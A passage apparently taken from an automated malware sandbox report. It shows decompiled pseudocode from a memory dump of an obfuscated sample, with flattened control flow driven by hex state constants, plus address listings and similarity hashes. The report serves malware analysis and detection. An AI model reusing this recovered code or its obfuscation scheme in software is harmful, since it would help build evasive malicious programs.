                                                                                                                                                                                                                    							goto L38;
                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                    							__eflags = _t856 - 0xd6a7ab2;
                                                                                                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                                                                                                    								_t856 = 0xb5f9057;
                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								__eflags = _t856 - 0xdf2930f;
                                                                                                                                                                                                                    								if(_t856 == 0xdf2930f) {
                                                                                                                                                                                                                    									E00A618B0(_t863, _v284, _v280);
                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                    									__eflags = _t856 - 0xe73aa5d;
                                                                                                                                                                                                                    									if(_t856 == 0xe73aa5d) {
                                                                                                                                                                                                                    										__eflags =  *_t766;
                                                                                                                                                                                                                    										if(__eflags == 0) {
                                                                                                                                                                                                                    											_t751 = _v28;
                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                    											_push(_v168);
                                                                                                                                                                                                                    											_push(_v136);
                                                                                                                                                                                                                    											_push(_v160);
                                                                                                                                                                                                                    											_t751 = E00A81E60(0xa610b8, _v32, __eflags);
                                                                                                                                                                                                                    											_t865 =  &(_t865[3]);
                                                                                                                                                                                                                    											_v28 = _t751;
                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                    										_t786 = _v60 | _v216 | _v248 | _v120 | _v224 | _v152 | _v200 | _v268 | _v188;
                                                                                                                                                                                                                    										_t858 = _a8 & 1;
                                                                                                                                                                                                                    										__eflags = _t858;
                                                                                                                                                                                                                    										if(_t858 != 0) {
                                                                                                                                                                                                                    											__eflags = _t786;
                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                    										_t752 = E00A772AA(_t786, _v100, _v20, _t786, _t786, _v264, _t751, _v172, _t786, _v272, _t786, _v180, _v208);
                                                                                                                                                                                                                    										_t855 = _t752;
                                                                                                                                                                                                                    										E00A7D6DF(_v156, _v28, _v164, _v96);
                                                                                                                                                                                                                    										_t865 =  &(_t865[0xd]);
                                                                                                                                                                                                                    										__eflags = _t752;
                                                                                                                                                                                                                    										if(__eflags == 0) {
                                                                                                                                                                                                                    											goto L26;
                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                    											_v48 = 1;
                                                                                                                                                                                                                    											E00A64772( &_v48, _v252, _t855, _v260, _v80, _v88, 4);
                                                                                                                                                                                                                    											_t865 =  &(_t865[5]);
                                                                                                                                                                                                                    											__eflags = _t858;
                                                                                                                                                                                                                    											if(__eflags != 0) {
                                                                                                                                                                                                                    												E00A75BFA(_v72, _v236, _v140, _t855, _v244, _v148,  &_v24,  &_v48);
                                                                                                                                                                                                                    												_t672 =  &_v48;
                                                                                                                                                                                                                    												 *_t672 = _v48 | _v132;
                                                                                                                                                                                                                    												__eflags =  *_t672;
                                                                                                                                                                                                                    												E00A64772( &_v48, _v124, _t855, _v276, _v64, _v228, _v24);
                                                                                                                                                                                                                    												_t865 =  &(_t865[0xb]);
                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                    											_t856 = 0x4c06b12;
                                                                                                                                                                                                                    											goto L10;
                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                    										__eflags = _t856 - 0xfe05c1f;
                                                                                                                                                                                                                    										if(_t856 != 0xfe05c1f) {
                                                                                                                                                                                                                    											goto L38;
                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                    											E00A618B0(_t855, _v112, _v68);
                                                                                                                                                                                                                    											L26:
                                                                                                                                                                                                                    											_t856 = 0x658e3dc;
                                                                                                                                                                                                                    											goto L10;
                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						goto L41;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                    			}







































































































                                                                                                                                                                                                                    0x00a80e7c
                                                                                                                                                                                                                    0x00a80e8c
                                                                                                                                                                                                                    0x00a80e93
                                                                                                                                                                                                                    0x00a80e9a
                                                                                                                                                                                                                    0x00a80ea4
                                                                                                                                                                                                                    0x00a80eab
                                                                                                                                                                                                                    0x00a80eb2
                                                                                                                                                                                                                    0x00a80eb3
                                                                                                                                                                                                                    0x00a80eba
                                                                                                                                                                                                                    0x00a80ec1
                                                                                                                                                                                                                    0x00a80ec8
                                                                                                                                                                                                                    0x00a80ecf
                                                                                                                                                                                                                    0x00a80ed0
                                                                                                                                                                                                                    0x00a80ed1
                                                                                                                                                                                                                    0x00a80ed2
                                                                                                                                                                                                                    0x00a80ed7
                                                                                                                                                                                                                    0x00a80edf
                                                                                                                                                                                                                    0x00a80ee2
                                                                                                                                                                                                                    0x00a80eec
                                                                                                                                                                                                                    0x00a80ef7
                                                                                                                                                                                                                    0x00a80ef9
                                                                                                                                                                                                                    0x00a80f04
                                                                                                                                                                                                                    0x00a80f09
                                                                                                                                                                                                                    0x00a80f11
                                                                                                                                                                                                                    0x00a80f19
                                                                                                                                                                                                                    0x00a80f21
                                                                                                                                                                                                                    0x00a80f29
                                                                                                                                                                                                                    0x00a80f2e
                                                                                                                                                                                                                    0x00a80f33
                                                                                                                                                                                                                    0x00a80f3b
                                                                                                                                                                                                                    0x00a80f4f
                                                                                                                                                                                                                    0x00a80f50
                                                                                                                                                                                                                    0x00a80f5b
                                                                                                                                                                                                                    0x00a80f64
                                                                                                                                                                                                                    0x00a80f6f
                                                                                                                                                                                                                    0x00a80f77
                                                                                                                                                                                                                    0x00a80f7c
                                                                                                                                                                                                                    0x00a80f84
                                                                                                                                                                                                                    0x00a80f8c
                                                                                                                                                                                                                    0x00a80f94
                                                                                                                                                                                                                    0x00a80fa1
                                                                                                                                                                                                                    0x00a80fa2
                                                                                                                                                                                                                    0x00a80fa6
                                                                                                                                                                                                                    0x00a80fae
                                                                                                                                                                                                                    0x00a80fb6
                                                                                                                                                                                                                    0x00a80fbe
                                                                                                                                                                                                                    0x00a80fc3
                                                                                                                                                                                                                    0x00a80fc8
                                                                                                                                                                                                                    0x00a80fd0
                                                                                                                                                                                                                    0x00a80fdb
                                                                                                                                                                                                                    0x00a80fe3
                                                                                                                                                                                                                    0x00a80fee
                                                                                                                                                                                                                    0x00a80ff9
                                                                                                                                                                                                                    0x00a81001
                                                                                                                                                                                                                    0x00a8100f
                                                                                                                                                                                                                    0x00a81013
                                                                                                                                                                                                                    0x00a8101b
                                                                                                                                                                                                                    0x00a81023
                                                                                                                                                                                                                    0x00a8102e
                                                                                                                                                                                                                    0x00a81039
                                                                                                                                                                                                                    0x00a81041
                                                                                                                                                                                                                    0x00a8104c
                                                                                                                                                                                                                    0x00a81054
                                                                                                                                                                                                                    0x00a8105c
                                                                                                                                                                                                                    0x00a81061
                                                                                                                                                                                                                    0x00a81065
                                                                                                                                                                                                                    0x00a8106f
                                                                                                                                                                                                                    0x00a81077
                                                                                                                                                                                                                    0x00a8107c
                                                                                                                                                                                                                    0x00a81084
                                                                                                                                                                                                                    0x00a8108c
                                                                                                                                                                                                                    0x00a81094
                                                                                                                                                                                                                    0x00a8109f
                                                                                                                                                                                                                    0x00a810aa
                                                                                                                                                                                                                    0x00a810b5
                                                                                                                                                                                                                    0x00a810bd
                                                                                                                                                                                                                    0x00a810cc
                                                                                                                                                                                                                    0x00a810cf
                                                                                                                                                                                                                    0x00a810d3
                                                                                                                                                                                                                    0x00a810db
                                                                                                                                                                                                                    0x00a810eb
                                                                                                                                                                                                                    0x00a810ef
                                                                                                                                                                                                                    0x00a810f7
                                                                                                                                                                                                                    0x00a810ff
                                                                                                                                                                                                                    0x00a81107
                                                                                                                                                                                                                    0x00a81112
                                                                                                                                                                                                                    0x00a8111a
                                                                                                                                                                                                                    0x00a81125
                                                                                                                                                                                                                    0x00a81130
                                                                                                                                                                                                                    0x00a8113b
                                                                                                                                                                                                                    0x00a8114a
                                                                                                                                                                                                                    0x00a8114d
                                                                                                                                                                                                                    0x00a81154
                                                                                                                                                                                                                    0x00a8115f
                                                                                                                                                                                                                    0x00a8116a
                                                                                                                                                                                                                    0x00a81172
                                                                                                                                                                                                                    0x00a8117d
                                                                                                                                                                                                                    0x00a81188
                                                                                                                                                                                                                    0x00a81193
                                                                                                                                                                                                                    0x00a8119e
                                                                                                                                                                                                                    0x00a811a9
                                                                                                                                                                                                                    0x00a811b1
                                                                                                                                                                                                                    0x00a811b9
                                                                                                                                                                                                                    0x00a811be
                                                                                                                                                                                                                    0x00a811c3
                                                                                                                                                                                                                    0x00a811cb
                                                                                                                                                                                                                    0x00a811d8
                                                                                                                                                                                                                    0x00a811e1
                                                                                                                                                                                                                    0x00a811e5
                                                                                                                                                                                                                    0x00a811ed
                                                                                                                                                                                                                    0x00a811f5
                                                                                                                                                                                                                    0x00a811fd
                                                                                                                                                                                                                    0x00a81205
                                                                                                                                                                                                                    0x00a8120d
                                                                                                                                                                                                                    0x00a81215
                                                                                                                                                                                                                    0x00a8121d
                                                                                                                                                                                                                    0x00a81225
                                                                                                                                                                                                                    0x00a8122d
                                                                                                                                                                                                                    0x00a8123a
                                                                                                                                                                                                                    0x00a8123e
                                                                                                                                                                                                                    0x00a81246
                                                                                                                                                                                                                    0x00a8124e
                                                                                                                                                                                                                    0x00a81256
                                                                                                                                                                                                                    0x00a8125e
                                                                                                                                                                                                                    0x00a81266
                                                                                                                                                                                                                    0x00a8126e
                                                                                                                                                                                                                    0x00a81276
                                                                                                                                                                                                                    0x00a8127b
                                                                                                                                                                                                                    0x00a81283
                                                                                                                                                                                                                    0x00a8128b
                                                                                                                                                                                                                    0x00a81293
                                                                                                                                                                                                                    0x00a812a0
                                                                                                                                                                                                                    0x00a812a4
                                                                                                                                                                                                                    0x00a812a9
                                                                                                                                                                                                                    0x00a812b3
                                                                                                                                                                                                                    0x00a812bb
                                                                                                                                                                                                                    0x00a812c3
                                                                                                                                                                                                                    0x00a812cb
                                                                                                                                                                                                                    0x00a812d3
                                                                                                                                                                                                                    0x00a812db
                                                                                                                                                                                                                    0x00a812e6
                                                                                                                                                                                                                    0x00a812eb
                                                                                                                                                                                                                    0x00a812f1
                                                                                                                                                                                                                    0x00a812f9
                                                                                                                                                                                                                    0x00a81301
                                                                                                                                                                                                                    0x00a81309
                                                                                                                                                                                                                    0x00a81311
                                                                                                                                                                                                                    0x00a81319
                                                                                                                                                                                                                    0x00a81326
                                                                                                                                                                                                                    0x00a81329
                                                                                                                                                                                                                    0x00a8132d
                                                                                                                                                                                                                    0x00a81332
                                                                                                                                                                                                                    0x00a8133a
                                                                                                                                                                                                                    0x00a81342
                                                                                                                                                                                                                    0x00a8134d
                                                                                                                                                                                                                    0x00a81358
                                                                                                                                                                                                                    0x00a81360
                                                                                                                                                                                                                    0x00a8136b
                                                                                                                                                                                                                    0x00a81376
                                                                                                                                                                                                                    0x00a8137e
                                                                                                                                                                                                                    0x00a81389
                                                                                                                                                                                                                    0x00a81394
                                                                                                                                                                                                                    0x00a8139c
                                                                                                                                                                                                                    0x00a813a7
                                                                                                                                                                                                                    0x00a813b4
                                                                                                                                                                                                                    0x00a813b8
                                                                                                                                                                                                                    0x00a813bd
                                                                                                                                                                                                                    0x00a813c2
                                                                                                                                                                                                                    0x00a813ca
                                                                                                                                                                                                                    0x00a813d5
                                                                                                                                                                                                                    0x00a813e0
                                                                                                                                                                                                                    0x00a813e8
                                                                                                                                                                                                                    0x00a813f3
                                                                                                                                                                                                                    0x00a81400
                                                                                                                                                                                                                    0x00a81404
                                                                                                                                                                                                                    0x00a81411
                                                                                                                                                                                                                    0x00a81415
                                                                                                                                                                                                                    0x00a8141d
                                                                                                                                                                                                                    0x00a8142f
                                                                                                                                                                                                                    0x00a81434
                                                                                                                                                                                                                    0x00a8143d
                                                                                                                                                                                                                    0x00a81448
                                                                                                                                                                                                                    0x00a8145b
                                                                                                                                                                                                                    0x00a8145c
                                                                                                                                                                                                                    0x00a81463
                                                                                                                                                                                                                    0x00a8146e
                                                                                                                                                                                                                    0x00a81476
                                                                                                                                                                                                                    0x00a8147a
                                                                                                                                                                                                                    0x00a8147e
                                                                                                                                                                                                                    0x00a81484
                                                                                                                                                                                                                    0x00a81488
                                                                                                                                                                                                                    0x00a81490
                                                                                                                                                                                                                    0x00a8149a
                                                                                                                                                                                                                    0x00a814a8
                                                                                                                                                                                                                    0x00a814ad
                                                                                                                                                                                                                    0x00a814b3
                                                                                                                                                                                                                    0x00a814bb
                                                                                                                                                                                                                    0x00a814c3
                                                                                                                                                                                                                    0x00a814cb
                                                                                                                                                                                                                    0x00a814d6
                                                                                                                                                                                                                    0x00a814e1
                                                                                                                                                                                                                    0x00a814ec
                                                                                                                                                                                                                    0x00a814f7
                                                                                                                                                                                                                    0x00a81502
                                                                                                                                                                                                                    0x00a81512
                                                                                                                                                                                                                    0x00a81515
                                                                                                                                                                                                                    0x00a8151c
                                                                                                                                                                                                                    0x00a81527
                                                                                                                                                                                                                    0x00a81532
                                                                                                                                                                                                                    0x00a8153d
                                                                                                                                                                                                                    0x00a81548
                                                                                                                                                                                                                    0x00a81553
                                                                                                                                                                                                                    0x00a8155b
                                                                                                                                                                                                                    0x00a81563
                                                                                                                                                                                                                    0x00a8156e
                                                                                                                                                                                                                    0x00a81584
                                                                                                                                                                                                                    0x00a81592
                                                                                                                                                                                                                    0x00a81597
                                                                                                                                                                                                                    0x00a815a0
                                                                                                                                                                                                                    0x00a815ab
                                                                                                                                                                                                                    0x00a815b6
                                                                                                                                                                                                                    0x00a815c1
                                                                                                                                                                                                                    0x00a815cc
                                                                                                                                                                                                                    0x00a815d7
                                                                                                                                                                                                                    0x00a815e2
                                                                                                                                                                                                                    0x00a815ed
                                                                                                                                                                                                                    0x00a815f5
                                                                                                                                                                                                                    0x00a815fa
                                                                                                                                                                                                                    0x00a81602
                                                                                                                                                                                                                    0x00a81607
                                                                                                                                                                                                                    0x00a8160f
                                                                                                                                                                                                                    0x00a81621
                                                                                                                                                                                                                    0x00a81624
                                                                                                                                                                                                                    0x00a8162b
                                                                                                                                                                                                                    0x00a81633
                                                                                                                                                                                                                    0x00a8163e
                                                                                                                                                                                                                    0x00a81646
                                                                                                                                                                                                                    0x00a8164e
                                                                                                                                                                                                                    0x00a81656
                                                                                                                                                                                                                    0x00a8165e
                                                                                                                                                                                                                    0x00a81666
                                                                                                                                                                                                                    0x00a81673
                                                                                                                                                                                                                    0x00a81677
                                                                                                                                                                                                                    0x00a8167f
                                                                                                                                                                                                                    0x00a81687
                                                                                                                                                                                                                    0x00a81692
                                                                                                                                                                                                                    0x00a8169d
                                                                                                                                                                                                                    0x00a816a8
                                                                                                                                                                                                                    0x00a816b3
                                                                                                                                                                                                                    0x00a816be
                                                                                                                                                                                                                    0x00a816d1
                                                                                                                                                                                                                    0x00a816d8
                                                                                                                                                                                                                    0x00a816e3
                                                                                                                                                                                                                    0x00a816ee
                                                                                                                                                                                                                    0x00a816f9
                                                                                                                                                                                                                    0x00a81704
                                                                                                                                                                                                                    0x00a8170c
                                                                                                                                                                                                                    0x00a81711
                                                                                                                                                                                                                    0x00a8171b
                                                                                                                                                                                                                    0x00a81720
                                                                                                                                                                                                                    0x00a81728
                                                                                                                                                                                                                    0x00a81733
                                                                                                                                                                                                                    0x00a8173b
                                                                                                                                                                                                                    0x00a81746
                                                                                                                                                                                                                    0x00a81751
                                                                                                                                                                                                                    0x00a81759
                                                                                                                                                                                                                    0x00a81764
                                                                                                                                                                                                                    0x00a81778
                                                                                                                                                                                                                    0x00a8177b
                                                                                                                                                                                                                    0x00a81782
                                                                                                                                                                                                                    0x00a8178d
                                                                                                                                                                                                                    0x00a81795
                                                                                                                                                                                                                    0x00a8179a
                                                                                                                                                                                                                    0x00a817a2
                                                                                                                                                                                                                    0x00a817aa
                                                                                                                                                                                                                    0x00a817b2
                                                                                                                                                                                                                    0x00a817bf
                                                                                                                                                                                                                    0x00a817c3
                                                                                                                                                                                                                    0x00a817c8
                                                                                                                                                                                                                    0x00a817cd
                                                                                                                                                                                                                    0x00a817d5
                                                                                                                                                                                                                    0x00a817e0
                                                                                                                                                                                                                    0x00a817eb
                                                                                                                                                                                                                    0x00a817f6
                                                                                                                                                                                                                    0x00a81801
                                                                                                                                                                                                                    0x00a81809
                                                                                                                                                                                                                    0x00a8180e
                                                                                                                                                                                                                    0x00a81816
                                                                                                                                                                                                                    0x00a81821
                                                                                                                                                                                                                    0x00a8182c
                                                                                                                                                                                                                    0x00a81837
                                                                                                                                                                                                                    0x00a8183f
                                                                                                                                                                                                                    0x00a81847
                                                                                                                                                                                                                    0x00a81854
                                                                                                                                                                                                                    0x00a81858
                                                                                                                                                                                                                    0x00a81860
                                                                                                                                                                                                                    0x00a8186b
                                                                                                                                                                                                                    0x00a81873
                                                                                                                                                                                                                    0x00a8187a
                                                                                                                                                                                                                    0x00a81885
                                                                                                                                                                                                                    0x00a81890
                                                                                                                                                                                                                    0x00a8189b
                                                                                                                                                                                                                    0x00a818a6
                                                                                                                                                                                                                    0x00a818ae
                                                                                                                                                                                                                    0x00a818b7
                                                                                                                                                                                                                    0x00a818c0
                                                                                                                                                                                                                    0x00a818c4
                                                                                                                                                                                                                    0x00a818cc
                                                                                                                                                                                                                    0x00a818d4
                                                                                                                                                                                                                    0x00a818dc
                                                                                                                                                                                                                    0x00a818e1
                                                                                                                                                                                                                    0x00a818e9
                                                                                                                                                                                                                    0x00a818f4
                                                                                                                                                                                                                    0x00a818ff
                                                                                                                                                                                                                    0x00a81907
                                                                                                                                                                                                                    0x00a81912
                                                                                                                                                                                                                    0x00a8191d
                                                                                                                                                                                                                    0x00a81928
                                                                                                                                                                                                                    0x00a81933
                                                                                                                                                                                                                    0x00a81946
                                                                                                                                                                                                                    0x00a8194d
                                                                                                                                                                                                                    0x00a81958
                                                                                                                                                                                                                    0x00a81963
                                                                                                                                                                                                                    0x00a8196e
                                                                                                                                                                                                                    0x00a81976
                                                                                                                                                                                                                    0x00a81981
                                                                                                                                                                                                                    0x00a81989
                                                                                                                                                                                                                    0x00a81991
                                                                                                                                                                                                                    0x00a819a1
                                                                                                                                                                                                                    0x00a819a4
                                                                                                                                                                                                                    0x00a819a8
                                                                                                                                                                                                                    0x00a819b4
                                                                                                                                                                                                                    0x00a819bc
                                                                                                                                                                                                                    0x00a819c1
                                                                                                                                                                                                                    0x00a819c9
                                                                                                                                                                                                                    0x00a819d1
                                                                                                                                                                                                                    0x00a819d8
                                                                                                                                                                                                                    0x00a819df
                                                                                                                                                                                                                    0x00a819df
                                                                                                                                                                                                                    0x00a819df
                                                                                                                                                                                                                    0x00a819e4
                                                                                                                                                                                                                    0x00a819e4
                                                                                                                                                                                                                    0x00a819e6
                                                                                                                                                                                                                    0x00a819e6
                                                                                                                                                                                                                    0x00a819ec
                                                                                                                                                                                                                    0x00a819ec
                                                                                                                                                                                                                    0x00a81b8f
                                                                                                                                                                                                                    0x00a81b94
                                                                                                                                                                                                                    0x00a81b97
                                                                                                                                                                                                                    0x00a81b9b
                                                                                                                                                                                                                    0x00a81ba7
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a819f2
                                                                                                                                                                                                                    0x00a819f8
                                                                                                                                                                                                                    0x00a81b47
                                                                                                                                                                                                                    0x00a81b49
                                                                                                                                                                                                                    0x00a81b50
                                                                                                                                                                                                                    0x00a81b51
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a819fe
                                                                                                                                                                                                                    0x00a81a04
                                                                                                                                                                                                                    0x00a81ae8
                                                                                                                                                                                                                    0x00a81aea
                                                                                                                                                                                                                    0x00a81aec
                                                                                                                                                                                                                    0x00a81afa
                                                                                                                                                                                                                    0x00a81afa
                                                                                                                                                                                                                    0x00a81aee
                                                                                                                                                                                                                    0x00a81af5
                                                                                                                                                                                                                    0x00a81af5
                                                                                                                                                                                                                    0x00a81b1c
                                                                                                                                                                                                                    0x00a81b21
                                                                                                                                                                                                                    0x00a81b26
                                                                                                                                                                                                                    0x00a81b2e
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a81a0a
                                                                                                                                                                                                                    0x00a81a10
                                                                                                                                                                                                                    0x00a81ad8
                                                                                                                                                                                                                    0x00a81ade
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a81a16
                                                                                                                                                                                                                    0x00a81a1c
                                                                                                                                                                                                                    0x00a81a5a
                                                                                                                                                                                                                    0x00a81a5b
                                                                                                                                                                                                                    0x00a81a7e
                                                                                                                                                                                                                    0x00a81a8a
                                                                                                                                                                                                                    0x00a81a95
                                                                                                                                                                                                                    0x00a81aaa
                                                                                                                                                                                                                    0x00a81aaf
                                                                                                                                                                                                                    0x00a81ab4
                                                                                                                                                                                                                    0x00a81abb
                                                                                                                                                                                                                    0x00a81abe
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a81a1e
                                                                                                                                                                                                                    0x00a81a1e
                                                                                                                                                                                                                    0x00a81a24
                                                                                                                                                                                                                    0x00a81da1
                                                                                                                                                                                                                    0x00a81da1
                                                                                                                                                                                                                    0x00a81da7
                                                                                                                                                                                                                    0x00a819e4
                                                                                                                                                                                                                    0x00a819e4
                                                                                                                                                                                                                    0x00a819e6
                                                                                                                                                                                                                    0x00a819e6
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a819e6
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a819e4
                                                                                                                                                                                                                    0x00a81a2a
                                                                                                                                                                                                                    0x00a81a30
                                                                                                                                                                                                                    0x00a81a4a
                                                                                                                                                                                                                    0x00a81a4d
                                                                                                                                                                                                                    0x00a81a4d
                                                                                                                                                                                                                    0x00a81a51
                                                                                                                                                                                                                    0x00a81a51
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a81a51
                                                                                                                                                                                                                    0x00a81a24
                                                                                                                                                                                                                    0x00a81a1c
                                                                                                                                                                                                                    0x00a81a10
                                                                                                                                                                                                                    0x00a81a04
                                                                                                                                                                                                                    0x00a819f8
                                                                                                                                                                                                                    0x00a81dc5
                                                                                                                                                                                                                    0x00a81dce
                                                                                                                                                                                                                    0x00a81baf
                                                                                                                                                                                                                    0x00a81baf
                                                                                                                                                                                                                    0x00a81bb5
                                                                                                                                                                                                                    0x00a81d9c
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a81bbb
                                                                                                                                                                                                                    0x00a81bbb
                                                                                                                                                                                                                    0x00a81bc1
                                                                                                                                                                                                                    0x00a81d92
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a81bc7
                                                                                                                                                                                                                    0x00a81bc7
                                                                                                                                                                                                                    0x00a81bcd
                                                                                                                                                                                                                    0x00a81dbc
                                                                                                                                                                                                                    0x00a81bd3
                                                                                                                                                                                                                    0x00a81bd8
                                                                                                                                                                                                                    0x00a81bda
                                                                                                                                                                                                                    0x00a81c08
                                                                                                                                                                                                                    0x00a81c0b
                                                                                                                                                                                                                    0x00a81c3f
                                                                                                                                                                                                                    0x00a81c0d
                                                                                                                                                                                                                    0x00a81c0d
                                                                                                                                                                                                                    0x00a81c19
                                                                                                                                                                                                                    0x00a81c20
                                                                                                                                                                                                                    0x00a81c2e
                                                                                                                                                                                                                    0x00a81c33
                                                                                                                                                                                                                    0x00a81c36
                                                                                                                                                                                                                    0x00a81c36
                                                                                                                                                                                                                    0x00a81c79
                                                                                                                                                                                                                    0x00a81c7d
                                                                                                                                                                                                                    0x00a81c7d
                                                                                                                                                                                                                    0x00a81c7f
                                                                                                                                                                                                                    0x00a81c81
                                                                                                                                                                                                                    0x00a81c81
                                                                                                                                                                                                                    0x00a81cb1
                                                                                                                                                                                                                    0x00a81cc4
                                                                                                                                                                                                                    0x00a81cd4
                                                                                                                                                                                                                    0x00a81cd9
                                                                                                                                                                                                                    0x00a81cdc
                                                                                                                                                                                                                    0x00a81cde
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a81ce4
                                                                                                                                                                                                                    0x00a81d07
                                                                                                                                                                                                                    0x00a81d0e
                                                                                                                                                                                                                    0x00a81d13
                                                                                                                                                                                                                    0x00a81d16
                                                                                                                                                                                                                    0x00a81d18
                                                                                                                                                                                                                    0x00a81d48
                                                                                                                                                                                                                    0x00a81d62
                                                                                                                                                                                                                    0x00a81d62
                                                                                                                                                                                                                    0x00a81d62
                                                                                                                                                                                                                    0x00a81d80
                                                                                                                                                                                                                    0x00a81d85
                                                                                                                                                                                                                    0x00a81d85
                                                                                                                                                                                                                    0x00a81d88
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a81d88
                                                                                                                                                                                                                    0x00a81bdc
                                                                                                                                                                                                                    0x00a81bdc
                                                                                                                                                                                                                    0x00a81be2
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a81be8
                                                                                                                                                                                                                    0x00a81bf8
                                                                                                                                                                                                                    0x00a81bfe
                                                                                                                                                                                                                    0x00a81bfe
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a81bfe
                                                                                                                                                                                                                    0x00a81be2
                                                                                                                                                                                                                    0x00a81bda
                                                                                                                                                                                                                    0x00a81bcd
                                                                                                                                                                                                                    0x00a81bc1
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a81bb5
                                                                                                                                                                                                                    0x00a819e4

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: !XA$*oQ$-S$A4ux$GBew$O9$P$Zn$^>$^-$^-$`W:$iK$ro&$w*
                                                                                                                                                                                                                    • API String ID: 0-2117817904
                                                                                                                                                                                                                    • Opcode ID: 9700e54440ada7167251254f27bc307cedcde137a15463d88823109553a86980
                                                                                                                                                                                                                    • Instruction ID: 64290f2110802ace451adcbfb832bae63a9b3d705bed206ef2ae5440b6ea563b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9700e54440ada7167251254f27bc307cedcde137a15463d88823109553a86980
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5972FFB15093818FD378DF25C58AA9BFBE1BBD4708F10891DE6DA96260D7B08949CF43
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                                    			E00A69082(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                                    				char _v24;
                                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                                    				char _v32;
                                                                                                                                                                                                                    				char _v36;
                                                                                                                                                                                                                    				signed int _v40;
                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                    				signed int _v52;
                                                                                                                                                                                                                    				signed int _v56;
                                                                                                                                                                                                                    				signed int _v60;
                                                                                                                                                                                                                    				signed int _v64;
                                                                                                                                                                                                                    				signed int _v68;
                                                                                                                                                                                                                    				signed int _v72;
                                                                                                                                                                                                                    				signed int _v76;
                                                                                                                                                                                                                    				signed int _v80;
                                                                                                                                                                                                                    				signed int _v84;
                                                                                                                                                                                                                    				signed int _v88;
                                                                                                                                                                                                                    				signed int _v92;
                                                                                                                                                                                                                    				signed int _v96;
                                                                                                                                                                                                                    				signed int _v100;
                                                                                                                                                                                                                    				signed int _v104;
                                                                                                                                                                                                                    				signed int _v108;
                                                                                                                                                                                                                    				signed int _v112;
                                                                                                                                                                                                                    				signed int _v116;
                                                                                                                                                                                                                    				signed int _v120;
                                                                                                                                                                                                                    				signed int _v124;
                                                                                                                                                                                                                    				signed int _v128;
                                                                                                                                                                                                                    				signed int _v132;
                                                                                                                                                                                                                    				signed int _v136;
                                                                                                                                                                                                                    				signed int _v140;
                                                                                                                                                                                                                    				signed int _v144;
                                                                                                                                                                                                                    				signed int _v148;
                                                                                                                                                                                                                    				signed int _v152;
                                                                                                                                                                                                                    				signed int _v156;
                                                                                                                                                                                                                    				signed int _v160;
                                                                                                                                                                                                                    				signed int _v164;
                                                                                                                                                                                                                    				signed int _v168;
                                                                                                                                                                                                                    				signed int _v172;
                                                                                                                                                                                                                    				signed int _v176;
                                                                                                                                                                                                                    				signed int _v180;
                                                                                                                                                                                                                    				signed int _v184;
                                                                                                                                                                                                                    				signed int _v188;
                                                                                                                                                                                                                    				signed int _v192;
                                                                                                                                                                                                                    				signed int _v196;
                                                                                                                                                                                                                    				signed int _v200;
                                                                                                                                                                                                                    				signed int _v204;
                                                                                                                                                                                                                    				signed int _v208;
                                                                                                                                                                                                                    				signed int _v212;
                                                                                                                                                                                                                    				signed int _v216;
                                                                                                                                                                                                                    				signed int _v220;
                                                                                                                                                                                                                    				signed int _v224;
                                                                                                                                                                                                                    				intOrPtr _v228;
                                                                                                                                                                                                                    				signed int _v232;
                                                                                                                                                                                                                    				signed int _v236;
                                                                                                                                                                                                                    				signed int _v240;
                                                                                                                                                                                                                    				signed int _v244;
                                                                                                                                                                                                                    				signed int _v248;
                                                                                                                                                                                                                    				signed int _v252;
                                                                                                                                                                                                                    				signed int _v256;
                                                                                                                                                                                                                    				signed int _v260;
